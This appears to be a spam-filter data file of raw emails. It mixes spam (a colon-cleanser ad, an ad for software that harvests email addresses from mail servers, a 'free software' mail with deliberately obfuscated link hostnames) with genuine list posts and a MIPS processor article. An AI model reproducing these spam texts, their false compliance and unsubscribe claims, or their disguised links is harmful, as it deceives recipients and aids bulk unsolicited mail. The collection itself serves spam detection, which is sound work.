 This Stuff REALLY WORKS &lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FF0000"&gt;!&lt;b=
 r&gt;
 &lt;/font&gt;
 &lt;font color=3D"#000000" face=3D"Geneva, Arial, Helvetica, san-serif"&gt;
             And We GUARANTEE IT For Life &lt;/font&gt;&lt;font face=3D"Tahoma" colo=
 r=3D"#FF0000"&gt;
 !!!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;b&gt;
 &lt;/b&gt;&lt;/i&gt;
 &lt;/font&gt;
             &lt;p&gt;
 &lt;b&gt;
 &lt;font face=3D"Geneva, Arial, Helvetica, san-serif" color=3D"#000080" size=3D=
 "4"&gt;STOP MAKING
 EXCUSES &lt;/font&gt;&lt;/b&gt;
 &lt;font color=3Dblack face=3D"Geneva, Arial, Helvetica, san-serif" size=3D"4=
 "&gt;&lt;font face=3D"Tahoma" color=3D"#000000"&gt;&lt;b&gt;CHANGE YOUR LIFE &lt;/b&gt;&lt;/font&gt;&lt;=
 b&gt;
 &lt;font face=3D"Tahoma" color=3D"#FF0000"&gt; TODAY!!!&lt;/font&gt;&lt;font face=3DTahom=
 a color=3Dblack&gt;
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#FF0000" size=3D"5"&gt;
 &lt;a href=3D"http://www.youremaildeals.com/diet/cleanser.shtml" style=3D"tex=
 t-decoration: none"&gt;
 &lt;font color=3D"#000000"&gt;&lt;span style=3D"background-color: #FFFF00"&gt;CLICK &lt;/=
 span&gt;
 &lt;/font&gt;&lt;/a&gt; &lt;/font&gt;
 &lt;a href=3D"http://www.youremaildeals.com/diet/cleanser.shtml" style=3D"tex=
 t-decoration: none"&gt;
 &lt;font color=3D"#000000"&gt;&lt;span style=3D"background-color: #FFFF00"&gt;
 &lt;font face=3D"Tahoma" color=3D"#FF0000" size=3D"5"&gt;HERE&lt;/font&gt;&lt;font face=3D=
 "Tahoma" size=3D"5"&gt; 
 TO READ ABOUT EXTREME COLON CLEANSER &lt;/font&gt;
 &lt;/span&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;/b&gt;&lt;/p&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &lt;font face=3D"Geneva, Arial, Helvetica, san-serif"&gt;
 &lt;font size=3D"4" face=3D"Tahoma" color=3D"black"&gt;Regularly $19.99&lt;b&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;font face=3D"Tahoma" color=3D"black"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;&lt;font si=
 ze=3D"5"&gt;Order
 &lt;/font&gt;&lt;/b&gt; &lt;/font&gt;&lt;font size=3D"5"&gt;&lt;b&gt;
 &lt;font face=3D"Tahoma" color=3D"#FF0000"&gt;TODAY&lt;/font&gt;&lt;font face=3D"Tahoma" =
 color=3D"black"&gt; 
 for &lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FF0000"&gt;ONLY&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;=
 font face=3D"Tahoma" color=3D"black"&gt;&lt;b&gt;&lt;font size=3D"5"&gt; $14.99 per bottl=
 e&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;font size=3D1 color=3D"#666666" face=3D"Tahoma"&gt;Copyright
 &amp;copy; 2000, 2001, 2002 Marketing Co-Op &lt;i&gt;All
 Rights Reserved.&lt;/i&gt;&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Tahoma" size=3D"1"&gt;We hope you=
  enjoy 
 receiving &lt;b&gt;Marketing Co-op&lt;/b&gt;'s special offer emails. You have received=
  this 
 special offer because you have provided permission to receive third party =
 email 
 communications regarding special online promotions or offers. However, if =
 you 
 wish to unsubscribe from this email list, please &lt;/font&gt;
 &lt;font face=3D"Tahoma" size=3D"1" color=3D"#666666"&gt;
 &lt;a href=3D"mailto:REMOVEME@btamail.net.cn"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;font face=
 =3D"Tahoma" size=3D"1"&gt;. 
 Please allow 2-3 weeks for us to remove your email address. You may receiv=
 e 
 further emails from&lt;br&gt;
 us during that time, for which we apologize. Thank you.&lt;/font&gt;&lt;/center&gt;
     &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/center&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear jm =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E
 =3CTABLE=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E
     =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 
       face=3D=22Arial Black=22 
       size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   
       To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   
       Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   
       a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   
       harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   
       color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   
       servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CUL=3E  
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   
         is intended for easy and convenient search large e-mail address lists   
         from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   
         and NT=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   
         connections=29=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   
         server if the server has disconnected and continue the searching at the   
         point where it has been interrupted=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   
         and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  
       =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   
       address searcher and bulk e-mail sender=2E It can verify more than 5500   
       email addresses per minute at only 56Kbps speed=2E It even allows you send   
       email to valid email address while searching=2E You can save the searching   
       progress and load it to resume work at your convenience=2E All you need to   
       do is just input an email address=2C and press the =22Search=22   
       button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery 
       Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email 
       Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ 
       39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   
       Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  
       href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   
       1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   
       2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial 
       size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   
       copy the following link into your URL =2C and then click =22 Enter=22 on your   
       Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   
       download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CDIV=3E  
       =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  
       =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  
       =3CP=3E=3C=2FP=3E=3C=2FTD=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  
   =3CTR=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E  
     =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   
       face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   
       size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   
       unsolicited emails to those who do not wish to receive our special   
       mailings=2E We have attained the services of an independent 3rd party to   
       overlook list management and removal services=2E This is not unsolicited   
       email=2E If you do not wish to receive further mailings=2C please click this   
       link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   
       target=3D=5Fblank=3E=3CFONT   
       color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  
       =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  
       face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  
       with all federal and state laws regarding email messages including the  
       California Business and Professions Code=2E We have provided the subject  
       line =22ADV=22 to provide you notification that this is a commercial  
       advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E 
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E 
 =3CBR=3E
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters &lt;tim.one@comcast.net&gt; is all like:
 &gt; I'm not sure what you're doing, but suspect you're storing individual
 &gt; WordInfo pickles.  If so, most of the administrative pickle bloat is
 &gt; due to that, and doesn't happen if you pickle an entire classifier
 &gt; instance directly.
 Yeah, that's exactly what I was doing--I didn't realize I was incurring
 administrative pickle bloat this way.  I'm specifically trying to make
 things faster and smaller, so I'm storing individual WordInfo pickles
 into an anydbm dict (keyed by token).  The result is that it's almost 50
 times faster to score messages one per run our of procmail (.408s vs
 18.851s).
 However, it *does* say all over the place that the goal of this project
 isn't to make the fastest or the smallest implementation, so I guess
 I'll hold off doing any further performance tuning until the goal starts
 to point more in that direction.  .4 seconds is probably fast enough for
 people to use it in their procmailrc, which is what I was after.
 &gt; If you're desparate to save memory, write a subclass?
 That's probably what I'll do if I get too antsy :)
 Trying to think of ways to sneak "administrative pickle boat" into
 casual conversation,
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugene Leitl:
 &gt;The original comment's context was digital signatures. A digital signature 
 &gt;is worth sqrat if any userspace app or rogue superuser code can grab your 
 &gt;keyring in clear
 If you have a rogue app on your machine, what
 keeps it from sniffing your passphrase? This is
 one of the reasons I keep harping on the need for
 thin, secure clients.
 &gt;A passphrase is a (long, secure) password unlocking (decrypting) your 
 &gt;keyring. You don't use a passphrase to read your email.
 When I read email, I want to respond to email,
 which means, were I using a digital signature,
 that it needs to be at the ready.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [EE Times] Iconoclast Designers Choose MIPS
</t>
  </si>
  <si>
    <t xml:space="preserve">"In fact, Caltech says that it actually spun out the same number of
 startups in 2001 -- a poor time, needless to say, for new ventures -- as
 it did in the boom year of 1999."  Oookaaaay...
 http://www.fulcrummicro.com/press/article_eeTimes_05-08-02.shtml
 Iconoclast designers choose MIPS
 By Anthony Cataldo
 May 28, 2002  
 SAN JOSE, Calif. -- A group of engineers in Calabasas Hills, CA wants to
 turn the microprocessor world on its head by doing the unthinkable:
 tossing out the clock and letting the signals move about unencumbered.
 For those designers, inspired by research conducted at nearby Caltech,
 clocks are for wimps.
 The Fulcrum Microsystems Inc. design team isn't the first to propose an
 asynchronous processor, but president and chief executive officer Robert
 Nunn wants to be the first to take a clockless, fire-breathing processor
 mainstream. "We really deal with an asynchronous world," he said. "We
 only make it synchronous for our own convenience."
 This is the kind of stuff that many in the processor industry would
 consider lunatic fringe, too weird for conservative embedded-systems
 designers. But the young processor company and more than a dozen others
 like it are anchored in the mainstream courtesy of the MIPS
 instruction-set architecture. More and more, MIPS is becoming the choice
 for maverick processor design teams seeking a place at the high end by
 fielding unorthodox devices. And if Motorola and IBM in the PowerPC camp
 aren't careful, they could see their performance leadership in the
 high-end embedded-processor market snatched away by some of these upstarts.
 In Austin, Texas, meanwhile, designers at another MIPS house, Intrinsity
 Inc., aren't prepared to ditch the clock. But they are putting a new
 spin on some old tricks such as giving each gate its own clock and then
 letting them overlap. Using such sleight of hand, the company hopes to
 soon deliver RISC-based processors that run at an eye-popping 2 GHz and
 consume just 10 to 15 watts.
 Fulcrum, Intrinsity and their brethren may once have been written off as
 interesting experiments, backed by venture capitalists who overlooked
 some of the finer details, like software compatibility. What lends them
 respectability is MIPS.
 Theirs for the asking 
 One reason young processor companies seem to be flocking to the platform
 is that its steward, MIPS Technologies Inc., has no qualms about
 licensing the instruction-set architecture (ISA), provided that the
 licensee agrees to meet a software-compatibility test suite. By
 contrast, processor-core rival ARM Ltd. has granted this privilege to
 just two of its many licensees, Intel and Motorola. And so far, the two
 PowerPC vendors, IBM Corp. and Motorola Inc., have rebuffed most
 requests to license that architecture, with the notable exception being
 FPGA vendor Xilinx Inc., which has licensed the 405 PowerPC from IBM.
 The MIPS ISA is also one of the simplest forms of
 reduced-instruction-set computing around, which tends to make it
 attractive to processor designers interested in extending the
 architecture. It was this and the wide availability of tools and
 software that drew Intrinsity to MIPS, even though the company is aiming
 at PowerPC sockets, as evidenced by its decision to adopt the RapidIO
 interface instead of HyperTransport, which has been favored by MIPS vendors.
 Good fit 
 "It's a nice, clean architecture and has an open model that allows us to
 add instructions," said Paul Nixon, chief executive officer of
 Intrinsity.  "You also get all the third-party tools that very easily
 fit into our base of platforms."
 There was a time when this openness was seen as a liability for MIPS. In
 the mid-1990s, before MIPS was spun out from Silicon Graphics Inc., the
 instruction set lacked a multiply-add instruction, so some MIPS vendors
 took it upon themselves to create their own. The problem was that this
 broke many of the development tools, causing headaches for compiler
 vendors like Green Hills Software Inc.
 "We went to MIPS and said we have 20 different compiler variants and
 it's embarrassing," said Craig Franklin, vice president of engineering
 at Green Hills and a respected microprocessor industry veteran. Franklin
 also wasn't shy about telling MIPS it needed to revamp its embedded
 application binary interface. "We went to MIPS and said we've done a
 dozen EABIs, let's clean up yours," he said.
 MIPS took the advice and wasted little time clamping down on
 architectural deviations, observers said. But the MIPS camp still has to
 live with a legacy of incompatible chips in the field. "To its credit,
 MIPS quickly caught on," said Jim Turley, a microprocessor industry
 analyst. "Going forward, MIPS is maintaining good control but they are
 still haunted by incompatibility among multiples."
 If the biggest risk to the MIPS camp is fragmentation, then the PowerPC
 camp has the opposite problem: architectural confinement. Though the
 PowerPC architecture carries the cachet of household names Motorola and
 IBM, these are essentially the only two companies that provide
 PowerPCs. It's not for lack of interest. Rather, the companies have been
 reluctant to cede control over the architecture. This could wind up
 hurting the PowerPC cause, though.
 "To get a PowerPC license is impossible or very expensive," Green Hills'
 Franklin said. "Tactically this may have been a mistake. If you're a
 Japanese company, all things being equal, you'd rather buy from another
 Japanese company."
 Analyst Turley, too, thinks the PowerPC camp will only stand to gain by
 licensing the architecture. "It's all about software compatibility and
 tool support. The more you can proliferate the architecture the better
 you're going to do," he said. "I don't think Motorola and IBM can
 address the entire market by themselves."
 There's a chance that this could change. IBM, for its part, is in the
 process of planning an expansion strategy for PowerPC that may involve
 more licensing. Though it's unlikely the PowerPC camp will ever have the
 open licensing model of MIPS Technologies, MIPS processor vendors may
 have more than just two competitors to worry about.
 "We're certainly not averse to [licensing]," said Lisa Su, director of
 PowerPC products at IBM. "The question is, how much do we do and who do
 we license to. There are various ways you could go, whether it's a hard
 core, soft core or licensing the ISA."
 But the fear of architectural fragmentation still looms large. "We know
 that if we have different microarchitectures we have to do work on
 software compatibility," Su said. "With MIPS there's a degree of
 fracturing. That may not always be a big problem, but if you go to other
 markets -- like consumer -- it becomes big. Our belief is there is a
 happy medium."
 Whatever path IBM takes it will act in its own best interest as a chip
 provider, not as a company that wants to hawk intellectual
 property. This is why the Xilinx licensing deal works for IBM: Big Blue
 is not so much interested in the royalties and fees it collects from
 Xilinx, but in the dual benefit of widening the appeal of the
 architecture and the revenue IBM generates from manufacturing the FPGAs
 for Xilinx in its own fabs. "We're not trying to make money off of
 licensing," Su said.
 Manufacturing is probably one of the most powerful weapons that PowerPC
 vendors IBM and Motorola wield. Both have gussied up their high-end
 lines with copper interconnect and silicon-on-insulator technology,
 still rarities among chip makers. This has helped both companies design
 relatively low-power embedded processors running at 1 GHz that are
 shipping today. IBM did it using 0.13-micron design rules and a
 four-stage pipeline; Motorola is using 0.18-micron design rules and a
 seven-stage pipe.
 The companies say there's more performance headroom in store. "When we
 get to 0.13 micron we'll get substantially faster," said Raj Handa,
 PowerPC and PowerQuicc marketing manager at Motorola.
 Proprietary processes 
 Most MIPS processor vendors, by contrast, rely on mainstream foundries
 that haven't developed the more-exotic process technologies. And even
 though companies like Motorola are shifting more capacity to outside
 foundries, they're keeping their special process recipes in-house to
 juice up their high-performance devices.
 Lacking this capability, most MIPS processor vendors will have little
 choice but to come up with dazzling architectural feats to keep up their
 chops at the high end. It should become clear in the next year or so how
 some of the newer players measure up.
 Intrinsity hopes to field its 2-GHz processors by the end of the
 year. Fulcrum is shooting for an early 2003 introduction. "We're going
 to shock the industry in terms of raw performance and speed-vs.-power
 performance," Fulcrum's Nunn said. "We really want to change the way the
 world designs semiconductors."
 http://www.fulcrummicro.com/press/article_fastco_04-02.shtml
 The Pasadena startup machine
 By Alison Overholt
 April, 2002  
 There was a time when every dorm room, it seemed, was a startup waiting
 to happen. Throughout the 1990s, kids cobbled together business plans
 between classes, won funding, and jumped into business. Risk? What risk?
 Plunging into a new venture seemed all too easy.
 Ah, the fickleness of youth. These days, most of the kids are back in
 class. Venture capitalists say that they're seeing precious few
 proposals out of MIT, Stanford, and almost every other university, save
 one: the California Institute of Technology.
 In fact, Caltech says that it actually spun out the same number of
 startups in 2001 -- a poor time, needless to say, for new ventures -- as
 it did in the boom year of 1999. While startup enthusiasm has faded on
 most campuses, Caltech has blossomed into a robust new-company machine.
 This didn't happen by accident. During the past seven years, Caltech's
 Office of Technology Transfer has carefully developed a strategy for
 cultivating commerce. "We focus on nurturing entrepreneurs
 scientifically more than other schools do," says Rich Wolfe, the
 office's associate director. That is, the university focuses more on the
 science itself than on the ensuing commercial opportunity.
 That's what grabbed Uri Cummings and Andrew Lines, two PhD students at
 Caltech who founded Fulcrum Microsystems in 2000. "There is a pervasive
 philosophy at Caltech that no problem is unsolvable," Cummings
 says. "There's a focus on scientific ingenuity that is thrilling to be
 around. Caltech has so many entrepreneurs because the school doesn't
 make it about business or focus on how much money they'll get out of
 it. Caltech is a catalyst, moving technology from the university out
 into industry, and students are thrilled to be a part of it."
 Before starting Fulcrum, Cummings and Lines worked for six years with
 Caltech computer-science professor Alain Martin on an
 asynchronous-circuit design for semiconductor chips. They ventured into
 commercialization while still in the throes of their doctoral program.
 That they could afford to do that points to another, more practical
 aspect to Caltech's approach. Other universities typically require
 entrepreneurs to pay up-front application and licensing fees for the use
 of technology patents. But Caltech believes that such payments stifle
 entrepreneurship, since young companies usually have little cash to
 spare. Instead, the school typically takes equity stakes in startups,
 and it defers collection of patent payments until fledgling companies
 are financially secure.
 For Caltech, it's a long-term bet. "The reality is that universities
 rely far more on their endowments than they could on any fees to be
 collected from the initial licensing process," Wolfe says. "So we seek a
 bite of the apple -- and we hope that if one of these entrepreneurs
 founds the next Intel, he'll not only share the equity but also bestow a
 gift on the university in remembrance that we took care of him when he
 was just getting started."
 Cummings and Lines may be in a position to do just that. Fulcrum has won
 about $20 million in venture funding amid the toughest venture market in
 recent history. Its founders have hired a credible CEO, Bob Nunn, who
 formerly ran Vitesse's telecom division, and hired 24 top students from
 their alma mater. And they've garnered rave reviews of their chip design
 from technology journals.
 One thing that Cummings and Lines haven't done yet: finished their
 degrees. Officially, both are now "on leave." They may not be back.
 ----
 aDaM@XeNT.CoM
 High-tech startups fail for only three reasons: stupidity, luck, and greed. 
 Tip one for would-be entrepreneurs: Avoid stupid and unlucky people. If
 you are stupid or have bad luck, don't start a high-tech business.
 Tip two for would-be entrepreneurs: Do a product that you want to do,
 not one that they want you to do.
 Startup founders generally have only ideas, charisma, and equity to work
 with. Ideas and charisma are cheap, but equity is expensive.  To make a
 start-up work, the founder has to divvy out parts of the business at
 just the right rate to keep everyone happy until the product is a
 success. Give away too much of your company too soon to a venture
 capitalist, to your co-workers, or even to yourself, and you risk
 running out of distributable shares before the product is done. And that
 probably means the product won't be done. Ever.
 Tip three for would-be entrepreneurs: Don't take venture funding too soon. 
 If you are doing a software product, don't take venture money until you
 need it to introduce the product.  Don't take venture money until you
 have used up all of your own money, your mother-in-law's money, and
 everything you can borrow.
 Bootstrap. Rent, don't buy. Don't hire people to do things you can
 contract out because contractors don't require stock options.
 As the founder, the man or woman with the grand plan, your function is
 to manage the distribution of your own holdings so that you end up with
 fewer shares but more wealth.
 Tip four for would-be entrepreneurs: Invite me to lunch. I'm a cheap date.
   -- Robert X. Cringely, http://www.pbs.org/cringely/pulpit/pulpit20010614.html
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pass-through publications are here
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Digital Authoring Tools : Featured Product Alert&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 6.00.2462.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=#666666 vLink=#6699cc aLink=#66cc66 link=#000066 bgColor=#ffffff&gt;
 &lt;DIV align=center&gt;
 &lt;P&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;IMG height=93 src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/emailhead6.gif" width=536 border=0 alt="If you are seeing this text AND a blank image, server demand is currently too high and you may be unable to download the FREE software.  Please re-open this mail again soon to retry, so that you may download FREE Software from Digital Authoring Tools."&gt;&lt;/A&gt;&lt;BR&gt;&lt;/P&gt;
 &lt;TABLE cellSpacing=0 cellPadding=3 width=536 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;IMG height=79       src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/level_hd2.gif" width=393 border=0 alt="If you are seeing this text AND a blank image, please open this mail again soon to get your FREE Software from Digital Authoring Tools."&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=6 width=536 bgColor=#ffffff border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top align=left width=314&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=-1&gt;&lt;FONT 
       color=#000000&gt;&lt;BR&gt;&lt;FONT color=#000066&gt;Today you had &lt;B&gt;100&lt;/b&gt; Digital Web Books downloaded and within two weeks there are &lt;b&gt;600&lt;/b&gt; circulating. 
 Two months later you have &lt;b&gt;4000&lt;/b&gt; in the marketplace. &lt;b&gt;Tidal Wave&lt;/b&gt; or &lt;b&gt;Viral Marketing&lt;/b&gt; is a wonder of our new society. &lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&lt;b&gt;See how major corporations&lt;/b&gt;&lt;/a&gt; have already embraced Digital Page Author.&lt;br&gt;
 &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT color=#000066&gt; &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;IMG height=50 src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/level_hd.gif" width=300 border=0 alt="The site may be temporarily unreachable due to high demand for this limited time FREE Software offer."&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" color=#000000 
       size=-1&gt;IMAGINE a tool that is very easy to learn yet will enable you to create &lt;b&gt;brilliant, 3D, real-life, book-like, page-turning digital documents&lt;/b&gt; that you can distribute via the internet, store on web-sites and send on floppy or a cd-rom, complete with active web and email links!&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=200&gt;
       &lt;DIV align=center&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;IMG height=147 
       src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/booklaptopsmall.jpg" width=200 border=0 alt="FREE Software from Digital Authoring Tools
 Due to high demand for this limited time FREE software offer, kindly open this mail again soon to retry if you have difficulties reaching the website."&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
